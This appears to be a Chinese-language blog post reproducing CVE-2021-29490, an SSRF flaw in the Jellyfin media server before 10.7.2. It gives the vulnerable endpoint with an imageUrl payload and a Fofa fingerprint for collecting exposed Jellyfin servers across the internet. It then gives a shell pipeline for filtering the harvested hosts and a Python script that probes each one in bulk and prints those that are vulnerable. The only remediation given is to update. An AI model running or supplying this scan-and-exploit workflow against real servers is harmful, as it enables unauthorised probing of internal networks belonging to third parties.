xfeng's blog
文章 标签 分类 关于 书架
xfeng's blog

目录

CVE-2021-29490-Jellyfin-SSRF

 收录于 漏洞复现
   约 479 字   预计阅读 1 分钟   次阅读

1. 漏洞简介

Jellyfin是一个自由软件媒体系统,可让您控制媒体的管理和流媒体。它是专有的Emby和Plex的替代品,可通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin是Emby 3.5.2版本的后代,移植到.NET Core框架以支持完整的跨平台支持。没有任何附加条件,只是一个团队想要更好地构建更好的东西并共同努力实现它,致力于让所有用户都能访问最好的媒体系统

Jellyfin RemoteImageController.cs 文件中存在 SSRF 漏洞,通过构造特殊的请求,探测内网信息

2. 影响版本

Jellyfin < 10.7.2

3. 漏洞复现

/Images/Remote?imageUrl=http://www.baidu.com

fofa搜索引擎的指纹为:“Jellyfin” && port=“8096” ,用 Fofa采集工具.exe 批量收集资产

https://image.xfeng.io/QmTVh5p45Kj5wX8NWKciua5XXqSg5fhSBhoBTp66dRAZRr.png

搜集到的资产结果会保存到同目录的一个result.csv文件中

https://image.xfeng.io/QmYBvELHWHvzyye5nrPf3N5iHVzVCUDkieLkmk952L5ALK.png

用shell命令筛选IP或者域名

cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt

再用python脚本批量验证

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def Jellyfin():
    with open("Jellyfin.txt") as file:
        for line in file:
            vuln_url = line + "/Images/Remote?imageUrl=http://www.baidu.com"

            try:
                response = requests.get(url=vuln_url, verify=False, timeout=10)
                if response.status_code == 200:
                    print(vuln_url)
                else:
                    pass
                    continue
            except Exception as e:
                pass
                #print(e)
                continue

def main():
    Jellyfin()

if __name__ == '__main__':
    main()

https://image.xfeng.io/Qme7aB3iXqyBt4xq8F2HutjU91zQfKK6E52VWBC6LLtxJa.png

4. 漏洞修复

更新版本

5. 参考链接

关于SSRF漏洞,可以看这个博文:

Web安全之SSRF漏洞

更新于 2024-08-14
阅读原始文档
 漏洞复现
返回 | 主页